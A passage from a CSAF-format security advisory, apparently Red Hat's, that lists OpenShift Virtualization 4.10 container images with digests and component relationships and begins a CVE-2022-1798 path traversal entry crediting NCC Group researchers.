"container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "product": { "name": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "product_id": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "product": { "name": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "product_id": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "product": { "name": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "product_id": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "product": { "name": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "product_id": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "product": { "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "product_id": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "product": { "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "product_id": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "product": { "name": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "product_id": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-controller\u0026tag=v4.10.5-3" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "product": { "name": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "product_id": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-handler\u0026tag=v4.10.5-3" } } }, { "category": "product_version", "name": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", "product": { "name": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", "product_id": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", "product_identification_helper": { "purl": "pkg:oci/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virtio-win\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "product": { "name": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "product_id": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-launcher\u0026tag=v4.10.5-3" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", "product": { "name": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", "product_id": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-operator\u0026tag=v4.10.5-3" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64" }, "product_reference": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64" }, "product_reference": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64" }, "product_reference": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64" }, "product_reference": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64" }, "product_reference": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64" }, "product_reference": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64" }, "product_reference": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64" }, "product_reference": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64" }, "product_reference": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64" }, "product_reference": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64" }, "product_reference": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64" }, "product_reference": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64" }, "product_reference": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64" }, "product_reference": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64" }, "product_reference": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64" }, "product_reference": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64" }, "product_reference": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64" }, "product_reference": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64" }, "product_reference": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64" }, "product_reference": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64" }, "product_reference": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64" }, "product_reference": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64" }, "product_reference": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64" }, "product_reference": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64" }, "product_reference": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", "relates_to_product_reference": "8Base-CNV-4.10" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64 as a component of CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64" }, "product_reference": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", "relates_to_product_reference": "8Base-CNV-4.10" } ] }, "vulnerabilities": [ { "acknowledgments": [ { "names": [ "Oliver Brooks and James Klopchic" ], "organization": "NCC Group" } ], "cve": "CVE-2022-1798", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2022-08-12T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", 